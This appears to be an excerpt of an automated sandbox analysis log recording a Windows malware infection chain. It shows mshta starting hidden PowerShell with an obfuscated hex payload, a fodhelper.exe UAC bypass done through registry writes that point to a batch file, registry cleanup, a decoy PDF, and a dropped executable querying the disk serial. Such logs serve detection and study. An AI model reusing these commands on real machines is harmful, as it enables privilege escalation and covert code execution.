          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nopJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
